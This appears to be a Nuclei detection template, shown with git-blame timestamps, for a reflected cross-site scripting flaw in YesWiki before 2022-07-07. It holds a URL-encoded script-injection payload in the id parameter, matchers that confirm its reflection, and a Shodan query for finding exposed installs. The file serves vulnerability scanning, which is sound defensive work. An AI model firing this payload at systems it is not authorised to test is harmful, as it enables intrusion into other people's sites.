nuclei-templates/vulnerabilities/other/yeswiki-xss.yaml

44 lines
1.0 KiB
YAML
Raw Normal View History

2022-08-08 21:08:54 +00:00
id: yeswiki-xss
info:
name: YesWiki <2022-07-07 - Cross-Site Scripting
2022-08-08 21:08:54 +00:00
author: arafatansari
severity: high
2022-08-08 21:08:54 +00:00
description: |
YesWiki before 2022-07-07 contains a cross-site scripting vulnerability via the id parameter in the AccueiL URL.
2022-08-08 21:08:54 +00:00
reference:
- https://huntr.dev/bounties/de4db96c-2717-4c0e-b7aa-eee756ca19d3/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
2022-08-08 21:08:54 +00:00
metadata:
2022-08-09 09:47:08 +00:00
verified: true
2022-08-08 21:08:54 +00:00
shodan-query: http.html:"yeswiki"
tags: yeswiki,unauth,huntr,cve,cve2022,xss
2022-08-08 21:08:54 +00:00
requests:
- method: GET
path:
2022-08-09 02:10:54 +00:00
- '{{BaseURL}}/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E'
2022-08-08 21:08:54 +00:00
matchers-condition: and
matchers:
2022-08-09 02:10:54 +00:00
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
2022-08-09 09:47:08 +00:00
- "Query failed:"
condition: and
2022-08-08 21:08:54 +00:00
- type: word
2022-08-09 02:10:54 +00:00
part: header
2022-08-08 21:08:54 +00:00
words:
2022-08-09 02:10:54 +00:00
- "text/html"
- type: status
status:
- 200
# Enhanced by mp on 2022/09/23